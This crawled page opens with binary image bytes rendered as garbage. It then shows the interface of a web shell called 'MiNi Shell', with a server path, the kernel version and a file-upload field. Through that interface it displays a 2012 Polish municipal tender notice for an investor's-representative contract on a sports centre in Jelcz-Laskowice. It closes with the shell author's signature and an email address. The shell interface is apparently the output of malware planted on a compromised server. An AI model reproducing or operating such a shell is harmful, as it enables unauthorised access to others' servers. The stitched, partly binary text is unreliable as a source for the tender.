JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121025/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121025/227383-N-2012.html

<p class="kh_header"><b>Jelcz-Laskowice: Inwestor zastępczy  nad realizacją  zadania pn. Budowa Centrum Sportu i Rekreacji przy ul.Oławskiej w Jelczu-Laskowicach</b><br>
<b>Numer ogłoszenia: 227383 - 2012; data zamieszczenia: 25.10.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Jelcz-Laskowice , W.Witosa 24, 55-230 Jelcz-Laskowice, woj. dolnośląskie, tel. 071 3817122, 3817145, faks 071 31817111.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.jelcz-laskowice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Inwestor zastępczy  nad realizacją  zadania pn. Budowa Centrum Sportu i Rekreacji przy ul.Oławskiej w Jelczu-Laskowicach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia  jest świadczenie usług Inwestora Zastępczego przy realizacji zdania pn. Budowa Centrum Sportu i Rekreacji przy ul. Oławskiej w Jelczu-Laskowicach w zakresie: 
-  weryfikacji dokumentacji budowlano-technicznej posiadanej przez Zamawiającego, 
- przygotowaniem i przeprowadzeniem postępowań przetargowych na wybór wykonawcy robót budowlanych, 
- nadzoru nad realizacją umów zawartych w wyniku postępowania o udzielenie zamówienia na roboty,
- realizacji zadania zgodnie z umową o dofinansowanie projektu pn. Budowa Centrum Sportu i Rekreacji przy ul. Oławskiej w Jelczu-Laskowicach współfinansowanego ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego Województwa Dolnośląskiego na lata 2007-2013 (RPO WD na lata 2007-2013)oraz z środków krajowych w tym: przygotowywanie i weryfikacja dokumentacji rozliczeniowej projektu  i prowadzenie sprawozdawczości.
.    Usługa obejmuje: zarządzanie i koordynację realizacji budowy, weryfikacje dokumen-tacji technicznej, przygotowanie dokumentacji przetargowej oraz przeprowadzenie postę-powań przetargowych, świadczenie usług zarządzania, kontroli i nadzoru inwestorskiego nad budową realizowaną w ramach umowy na roboty budowlane, świadczenie usług za-rządzania i kontroli nad dostawami urządzeń oraz materiałów w ramach podpisanej umo-wy , uzyskanie pozwolenia na użytkowanie obiektu.
 W zakresie zarządzania i nadzoru, jaki ma być świadczony w ramach niniejszego za-mówienia Inwestor zastępczy ma zapewnić płynne wdrożenie umów na roboty budowlane, kontrolę budżetu projektu, terminowy odbiór robót oraz prawidłowe  funkcjonowanie obiektu Centrum Sportu i Rekreacji,  z infrastrukturą towarzyszącą, a także spełnienie przez Zama-wiającego wszystkich warunków narzuconych umową o dofinansowanie zawartej z Instytucją Zarządzającą RPO WD na lata 2007-2013 oraz współpracować z Zamawiającym przy pozy-skaniu, wdrożeniu i rozliczeniu  w/w  inwestycji z udziałem środków krajowych

	 Podstawowe dane obiektu:
Budowa Centrum Sportu i Rekreacji o podstawowych parametrach:
- wysokość budynku:  15,80m, 
- widownia: 934 miejsc siedzących (miejsca dodatkowe na płycie boiska do łącznie 1200 miejsc),
- jedna kondygnacja podziemna i 2 kondygnacje naziemne 
- powierzchnia boiska z widownią: 1.918,33m2,
- powierzchnia zabudowy hali: 3.744,65m2,
- powierzchnia użytkowa: 5.163,49m2,
wraz z wymiennikiem gruntowym ciepła i infrastrukturą towarzyszącą..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>do 20 % wartości zamówienia podstawowego</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.00.00.00-8, 71.52.00.00-9, 71.24.40.00-0, 71.31.00.00-4, 71.24.70.00-1, 71.24.80.00-8, 79.99.40.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2014.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca zobowiązany jest wnieść wadium przed upływem terminu składania ofert w wysokości 10.000,00 PLN (słownie: dziesięć tysięcy złotych 00/100).</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiajacy dokona oceny na podstawie oświadczenia Wykonawcy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>10.4.	Zamawiający uzna spełnienie warunku udziału w postępowaniu, o którym mowa , jeżeli wykonawca wykaże, że w ciągu ostatnich trzech lat przed upływem terminu składania ofert, a jeśli okres działalności jest krótszy - w tym okresie wykonał co najmniej jedną usługę pełnienia funkcji inwestora zastępczego lub Inżyniera Kontraktu dla robót budowlanych wraz z finansowym rozliczeniem inwestycji o wartości  nie mniejszej niż 400.000,00 zł (czterysta tysięcy złotych) brutto, lub dwie takie usługi o wartości nie mniejszej niż 200.000,00 zł (dwieście  tysięcy złotych) brutto każda, przy czym ta usługa (usługi) dotyczy zakończonych i rozliczonych robót budowlanych (jako wykonane roboty budowlane należy rozumieć doprowadzenie realizacji określonych robót budowlanych, co najmniej do wystawienia Protokołu odbioru robót lub Świadectwa Przejęcia, stwierdzającego niewadliwe, tj. prawidłowe wykonanie inwestycji), obejmujących wykonanie robót obejmujących co najmniej następujące specjalności łącznie: konstrukcyjno - budowlaną, drogową; instalacyjną w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, wodociągowych i kanalizacyjnych; instalacyjną w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych, telekomunikacyjną - o wartości robót budowlanych co najmniej 20.000.000,00 złotych brutto  i  roboty te dotyczyły budynku użyteczności publicznej.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiajacy dokona oceny na podstawie oświadczenia Wykonawcy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna spełnienie warunku udziału w postępowaniu, o którym mowa jeżeli wykonawca wykaże, że:
-Zapewni, wśród osób, które będą uczestniczyć w wykonywaniu zamówienia Kierownika Projektu, posiadającego wykształcenie wyższe techniczne lub ekonomiczne, minimum 5-letnie doświadczenie zawodowe w zarządzaniu lub kierowaniu zespołem nadzorującym realizację i rozliczenia inwestycji publicznych jako kierownik zespołu lub kierownik projektu, w tym dla co najmniej jednej inwestycji o wartości min. 20 mln zł brutto.
- Zapewni wśród osób, które będą uczestniczyć w wykonywaniu zamówienia Kierownika Zespołu Inspektorów Nadzoru Inwestorskiego, który musi posiadać uprawnienia w specjalności konstrukcyjno- budowlanej i spełniać wymagania szczególne wskazane w pkt. 10.5.4.,
- Zapewni, wśród osób, które będą uczestniczyć w wykonywaniu zamówienia, jako inspektorzy nadzoru inwestorskiego, minimum po jednej osobie w każdej ze specjalności:
a)	konstrukcyjno - budowlanej;
b)	drogowej;
c)	instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych;
d)	instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych;
e)	telekomunikacyjnej
-	Osoby, o których mowa w pkt. 10.5.2 i 10.5.3 muszą:
a)	posiadać minimum 3-letnie doświadczenie w pełnieniu funkcji inspektora nadzoru inwestorskiego, w tym w nadzorowaniu - każda w swojej specjalności, w której została wskazana w niniejszym postępowaniu - minimum jednej wykonanej roboty budowlanej, o wartości min. 20 mln zł brutto,(wartość ogólna inwestycji )
-	za wyjątkiem osoby wskazanej przez Wykonawcę jako inspektora nadzoru inwestorskiego w specjalności drogowej, w którym to przypadku osoba ta musi posiadać minimum 3-letnie doświadczenie w pełnieniu funkcji inspektora nadzoru inwestorskiego w specjalności drogowej,
-	za wyjątkiem osoby wskazanej przez Wykonawcę jako Kierownika Zespołu Inspektorów Nadzoru Inwestorskiego, w którym to przypadku osoba ta musi posiadać minimum 5-letnie doświadczenie zawodowe w nadzorowaniu robót budowlanych lub kierowaniu robotami budowlanymi w  specjalności konstrukcyjno-budowlanej.
Funkcja Kierownika Zespołu Inspektorów Nadzoru Inwestorskiego może być łączona z pełnieniem funkcji inspektora nadzoru inwestorskiego w specjalności konstrukcyjno-budowlanej. W takim wypadku wskazana osoba musi łącznie spełniać warunki dla inspektora nadzoru inwestorskiego w specjalności konstrukcyjno - budowlanej oraz warunki dla Kierownika Zespołu Inspektorów Nadzoru Inwestorskiego.
b)	posiadać uprawnienia do kierowania robotami budowlanymi bez ograniczeń w zakresie specjalności, w której została wskazana w niniejszym postępowaniu jako inspektor nadzoru inwestorskiego,
c)	osoba która będzie nadzorowała roboty związane z wykonaniem instalacji zabezpieczenia technicznego musi posiadać licencję pracownika zabezpieczenia technicznego I stopnia albo stopnia wyższego.
-	Zapewni wśród osób biorących udział w wykonaniu zamówienia minimum jedną osobę, która ma doświadczenie w prowadzeniu wszystkich czynności związane z prawidłowym rozliczeniem projektu, w tym - minimum jednego rozliczonego projektu, o wartości min. 20 mln zł brutto, obejmującej rozliczenie inwestycji publicznej współfinansowanej z środków UE.
Poprzez prawidłowe rozliczenie projektu rozumie się zaakceptowanie końcowego wniosku o płatność/ rozliczenia inwestycji/ (ostatecznie rozliczającego poniesione na realizację inwestycji wydatki) oraz wypłatę ostatniej transzy środków przez instytucję/e finansującą/e, tym samym zamykające finansową stronę realizacji inwestycji zgodnie z planowanym przez inwestora montażem finansowym.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>10.6.	Zamawiający uzna spełnienie warunku udziału w postępowaniu, o którym mowa , jeżeli wykonawca wykaże, że jest ubezpieczony od odpowiedzialności cywilnej z tytułu prowadzonej działalności gospodarczej, związanej z przedmiotem umowy na sumę gwarancyjną wynoszącą minimum 1 000 000,00 PLN (słownie: jeden milion złotych).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania zmiany umowy w następujących wypadkach:
Zamawiający dopuszcza możliwość wydłużenia terminów realizacji przedmiotu umowy w przypadku przedłużenia terminu realizacji robót budowlanych objętych nadzorem inwestorskim oraz zmianę zakresu przedmiotu umowy ze względu na zmianę umowy z wykonawcą robót budowlanych ,  przy czym wydłużenie terminu wykonania umowy lub zmiana zakresu przedmiotu umowy wynikająca ze zmiany umowy z wykonawcą robót budowlanych nie może skutkować roszczeniem Wykonawcy o dodatkowe wynagrodzenie,
-	dopuszczalna jest zmiana umowy polegająca na zmianie danych Wykonawcy bez zmian samego Wykonawcy (np. zmiana siedziby, adresu, nazwy),
-	dopuszczalna jest zmiana wynagrodzenia Wykonawcy w przypadku zmiany powszechnie obowiązujących przepisów w zakresie wysokości stawki podatku od towarów i usług na przedmiot świadczenia,
-	dopuszczalne są zmiany postanowień umowy, które wynikają ze zmiany obowiązujących przepisów, jeżeli konieczne będzie dostosowanie postanowień umowy do nowego stanu prawnego,
-	dopuszczalne jest obniżenie wynagrodzenia Wykonawcy w przypadku przerwania wykonywania usług będących przedmiotem niniejszej umowy, z powodu okoliczności, za które odpowiedzialność ponosi Wykonawca. Wysokość wynagrodzenia za wykonane do dnia przerwania wykonywania usługi ustalona będzie przez przedstawicieli obu stron na podstawie protokołu zaawansowania realizacji inwestycji i zaawansowania prac w zakresie zastępstwa inwestycyjnego, podpisanego przez obie strony umowy,
-	jeżeli wystąpiła konieczność zmiany kierownika zespołu inspektorów nadzoru inwestorskiego lub inspektorów nadzoru inwestorskiego/lub personelu Inwestora Zastępczego lub Zamawiającego (w tym wypadku konieczne jest aby zaproponowany nowy kierownik/inspektor/personel Inwestora Zastępczego posiadał co najmniej takie doświadczenie i co najmniej takie uprawnienia, jak osoba, którą zastępuje),
-	dopuszczalna jest zmiana numeru rachunku bankowego wykonawcy, podanego w umowie, w przypadku zmiany rachunku bankowego wykonawcy, na który następować ma zapłata wynagrodzenia za wykonanie przedmiotu niniejszego zamówienia,
-	dopuszczalne jest obniżenie wynagrodzenia Wykonawcy w związku ze zmniejszeniem zakresu świadczenia umownego Wykonawcy,
	jeżeli konieczność wprowadzenia takich zmian wynika z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy lub zmiany te są korzystne dla zamawiającego</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.um.jelcz-laskowice.finn.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> GMINA JELCZ-LASKOWICE
UL. WITOSA 24
55-220 JELCZ-LASKOWICE
pok.13.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.11.2012 godzina 09:30, miejsce: GMINA JELCZ-LASKOWICE
UL. WITOSA 24
55-220 JELCZ-LASKOWICE
sekretariat pok.20.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany przez Unię Europejską z Europejskiego Funduszu Rozwoju Regionalnego w ramach  Regionalnego Programu Operacyjnego Województwa Dolnośląskiego na lata 2007-2013l.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com